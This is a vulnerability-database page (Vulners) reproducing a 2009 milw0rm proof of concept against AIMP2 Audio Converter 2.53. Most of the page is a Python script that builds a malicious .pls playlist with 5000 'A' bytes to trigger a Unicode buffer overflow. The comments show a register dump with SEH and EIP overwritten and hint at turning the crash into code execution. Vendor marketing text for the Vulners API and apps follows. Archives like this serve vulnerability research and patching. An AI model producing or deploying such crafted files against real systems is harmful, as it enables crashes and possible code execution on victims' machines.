Vulners
Lucene search
AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)
#!/usr/bin/python
#
# ######################################################################
#
# AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC
# Found & exploited by: mr_me
# Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip
# Tested on: Wind0ws XP SP3
#
# ######################################################################
#
# Unicode overflow, maybe someone with better skills can exploit this
# you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction.
# Here is the crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exemption handler to overwrite EIP...
#
# EIP 00410041
#
header = ("[playlist]\nNumberOfEntries=3\n\n");
header += ("File1=");
crash = ("\x41" * 5000);
buffer = header + crash
file=open('mr_mes_funky.pls','w')
file.write(buffer)
file.close()
print "[+] mr_mes_funky.pls file created successfully"
# milw0rm.com [2009-09-01]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2009 00:00Current
7.4High risk
Vulners AI Score7.4